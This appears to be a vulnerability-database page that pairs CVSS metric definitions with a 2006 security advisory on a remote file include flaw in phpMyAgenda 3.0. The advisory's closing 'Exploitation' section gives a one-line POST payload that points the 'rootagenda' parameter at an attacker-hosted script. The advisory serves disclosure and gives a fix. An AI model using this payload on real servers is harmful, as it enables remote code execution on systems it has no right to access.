The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
High
AC
The successful attack depends on the evasion or circumvention of security-enhancing techniques in place that would otherwise hinder the attack. These include: Evasion of exploit mitigation techniques. The attacker must have additional methods available to bypass security measures in place. For example, circumvention of address space randomization (ASLR) or data execution prevention must be performed for the attack to be successful. Obtaining target-specific secrets. The attacker must gather some target-specific secret before the attack can be successful. A secret is any piece of information that cannot be obtained through any amount of reconnaissance. To obtain the secret the attacker must perform additional attacks or break otherwise secure measures (e.g. knowledge of a secret key may be needed to break a crypto channel). This operation must be performed for each attacked target.
Integrity
None
I
There is no impact on the integrity of the system; the attacker does not gain the ability to modify any files or information on the target system.
Availability
None
A
There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
[MajorSecurity] phpMyAgenda 3.0 Final - Remote File Include Vulnerability
--------------------------------------------------------
Software: phpMyAgenda
Version: 3.0 Final
Type: Remote File Include Vulnerability
Date: April, 24th 2006
Vendor: phpMyAgenda
Page: http://phpmyagenda.com
Risc: High
Credits:
----------------------------
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
Affected Products:
----------------------------
phpMyAgenda 3.0 Final and prior
Description:
----------------------------
phpMyAgenda is a complete web application that allows you to manage
and publish events (concert, meetings, etc...).
It stores description, dates, places, contacts, event registrations, and event polls.
Requirements:
----------------------------
register_globals = On
Vulnerability:
----------------------------
Input passed to the "rootagenda" parameter in "agenda.php3" is not
properly verified, before it is used to include files.
This can be exploited to execute arbitrary code by including files from external resources.
Solution:
----------------------------
Edit the source code to ensure that input is properly sanitised.
Set "register_globals" to "Off".
Exploitation:
----------------------------
Post data:
rootagenda=http://www.yourspace.com/yourscript.php?